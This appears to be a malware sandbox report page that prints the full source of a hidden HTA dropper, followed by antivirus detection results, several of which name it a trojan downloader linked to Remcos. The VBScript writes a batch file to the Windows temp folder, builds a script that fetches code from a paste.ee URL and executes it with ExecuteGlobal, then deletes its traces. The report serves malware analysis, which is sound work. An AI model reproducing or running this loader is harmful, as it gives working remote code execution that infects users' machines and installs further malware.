Static | ZeroBOX
No static analysis available.
<!DOCTYPE html>
<html>
<head>
<title>Executar Script</title>
<HTA:APPLICATION
APPLICATIONNAME="ScriptExecutor"
BORDER="none"
CAPTION="no"
SHOWINTASKBAR="no"
SINGLEINSTANCE="yes"
WINDOWSTATE="minimize"
/>
<script language="VBScript">
Dim aphorismic
Set aphorismic = CreateObject("WScript.Shell")
Dim Oonagh
Oonagh = "C:\Windows\Temp\troublespot.bat"
Dim rallum, infanticides
Set rallum = CreateObject("Scripting.FileSystemObject")
Set infanticides = rallum.CreateTextFile(Oonagh, True)
infanticides.WriteLine "@echo off"
infanticides.WriteLine "setlocal"
infanticides.WriteLine "set ""fugues=C:\Windows\Temp\organistrum.vbs"""
infanticides.WriteLine ">" & """%fugues%""" & " ("
infanticides.WriteLine " echo Dim noncatalog, documentarist"
infanticides.WriteLine " echo noncatalog = ""https://paste.ee/d/l1hEZDil/0"""
infanticides.WriteLine " echo Set documentarist = CreateObject^(""MSXML2.XMLHTTP""^)"
infanticides.WriteLine " echo documentarist.open ""GET"", noncatalog, False"
infanticides.WriteLine " echo documentarist.send"
infanticides.WriteLine " echo If documentarist.Status = 200 Then"
infanticides.WriteLine " echo ExecuteGlobal documentarist.responseText"
infanticides.WriteLine " echo End If"
infanticides.WriteLine ")"
infanticides.WriteLine "start """" /b wscript //nologo ""%fugues%"""
infanticides.WriteLine "timeout /t 1 /nobreak >nul"
infanticides.WriteLine "del ""%fugues%"""
infanticides.WriteLine "endlocal"
infanticides.Close
aphorismic.Run "cmd.exe /c " & Oonagh, 0, False
window.close
</script>
</head>
<body>
</body>
</html>
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX vba.trojan.generic
CAT-QuickHeal Clean
Skyhigh BehavesLike.HTML.Dropper.zr
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Trojan Horse
ESET-NOD32 VBS/TrojanDownloader.Agent.ZTN
TrendMicro-HouseCall Possible_SCRDL
Avast Script:SNH-gen [Drp]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot HTML.Z.Agent.1968
MicroWorld-eScan Clean
Tencent Vbs.Trojan-Downloader.Der.Lcnw
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Possible_SCRDL
CMC Clean
Emsisoft Clean
huorong TrojanDownloader/JS.NetLoader.ba
FireEye Clean
Jiangmin Clean
Varist VBS/Agent.BYV!Eldorado
Avira Clean
Fortinet VBS/Agent.ZTN!tr.dldr
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:VBS/Remcos.NMG!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:YsOmHqki5N)
Yandex Clean
Ikarus Trojan-Downloader.VBS.Agent
MaxSecure Clean
GData HTML.Trojan.Agent.YSBVTE
AVG Script:SNH-gen [Drp]
Panda Clean
alibabacloud Trojan[downloader]:Win/Remcos.NZC2XJC
No IRMA results available.